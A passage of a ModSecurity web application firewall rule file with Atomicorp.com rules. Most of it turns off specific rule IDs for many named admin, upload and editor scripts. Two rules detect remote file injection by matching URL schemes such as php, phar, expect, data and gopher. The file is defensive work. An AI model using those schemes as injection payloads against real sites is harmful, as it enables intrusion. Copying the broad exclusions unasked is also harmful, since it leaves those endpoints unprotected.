(MM)',logdata:'%{MATCHED_VAR}',chain"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_92130

SecRule REQUEST_FILENAME "/link_list\.js\.php" "phase:2,id:92131,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340003,ctl:ruleRemovebyID=340020,ctl:ruleRemovebyID=340158"

SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:92132,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/cgi-bin/send\.pl" "phase:2,id:92133,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340158,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=341049,ctl:ruleRemovebyID=340157"

SecRule REQUEST_FILENAME "/send_mail_with_attachment\.php" "phase:2,id:92134,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/ts_manage\.php" "phase:2,id:92135,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/plugins/eqdkp_uploader/dialog\.php" "phase:2,id:92136,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/plugins/eqdkp_lightbox/dialog\.php" "phase:2,id:92137,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/addeditproperties\.php" "phase:2,id:92138,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/muokkaa_suomi\.php" "phase:2,id:92139,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cms/setpage\.php" "phase:2,id:92140,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/quick_updates\.php" "phase:2,id:92141,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/custom404css\.php" "phase:2,id:92142,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/extra_info_pages\.php" "phase:2,id:92143,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/wp-admin/edit-tags\.php" "phase:2,id:92144,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/qrcode/img\.php" "phase:2,id:92145,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/randomimage\.php" "phase:2,id:92146,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/acp/user\.php" "phase:2,id:92147,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/save_page_settings\.php" "phase:2,id:92148,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/changedata\.php" "phase:2,id:92149,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/cadmin/index\.php" "phase:2,id:92150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/magento/index\.php/banner" "phase:2,id:92151,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/factor_edit\.php" "phase:2,id:92152,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin/options/editpl\.php" "phase:2,id:92153,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/upload/scripts/ajax\.sfsyncphotos\.php" "phase:2,id:92154,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/adminepharmac\.php" "phase:2,id:92155,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/siteadmin/leafs/addinline" "phase:2,id:92156,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/dmxeditor/dialogs/upload\.php" "phase:2,id:92157,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/plugins/system/phpimageeditor/index\.php" "phase:2,id:92158,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/galeria/thumbs\.php" "phase:2,id:92159,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/prize_posting\.php" "phase:2,id:92160,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/clientservices\.php" "phase:2,id:92161,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/ajax_save_name\.php" "phase:2,id:92162,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/ckeditor/xss" "phase:2,id:92163,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/muuta\.php" "phase:2,id:92164,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:92165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/envoi-code\.html" "phase:2,id:92166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/tiki-edit_css\.php" "phase:2,id:92167,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin/index\.cfm" "phase:2,id:92168,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/e107_plugins/sgallery/showpic\.php" "phase:2,id:92169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/modules/mod_rar_radio/tmpl/player/player\.php" "phase:2,id:92170,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/editpackage\.php" "phase:2,id:92171,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/systeembeheer/mysql" "phase:2,id:92172,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/view_system_style_source\.php" "phase:2,id:92173,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin/autorisierung\.php" "phase:2,id:92174,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/updatetemp\.html" "phase:2,id:92175,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin_zoej\.php" "phase:2,id:92176,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/content/item/edit/" "phase:2,id:92177,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/cgi-bin/helpdesk/ajax\.cgi" "phase:2,id:92178,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/ajax_image_thumbnail\.php" "phase:2,id:92179,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/ajax_delete_file\.php" "phase:2,id:92180,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/tools/reacties\.php" "phase:2,id:92181,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/administration/basic_settings\.php" "phase:2,id:92182,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/fdlhq/admin/config\.php" "phase:2,id:92183,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:92184,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sysext/tstemplate/" "phase:2,id:92185,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/dbadmin/" "phase:2,id:92186,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/tbl_structure\.php" "phase:2,id:92187,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/imagens\.php" "phase:2,id:92188,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/app_dev\.php" "phase:2,id:92189,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/generator/index\.php" "phase:2,id:92190,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390712"

SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:92191,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/editcode/" "phase:2,id:92192,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/admin/pages/thememail\.php" "phase:2,id:92193,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin/pages/themechooser\.php" "phase:2,id:92194,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/thumbopen\.php" "phase:2,id:92195,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92196,t:none,pass,nolog,skipAfter:END_RULES_92196"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:341726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341727,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_92196

SecRule REQUEST_FILENAME "/sendmessage\.php" "phase:2,id:92197,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/admin-themes-editor\.php" "phase:2,id:92198,t:none,t:lowercase,pass,nolog,noauditlog"

SecRule REQUEST_FILENAME "/kangooadmin/index\.php" "phase:2,id:92199,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:92200,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/backmin/index\.php" "phase:2,id:92201,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/livechat/ajax/footprints\.php" "phase:2,id:92202,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/typo3conf/" "phase:2,id:92203,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"

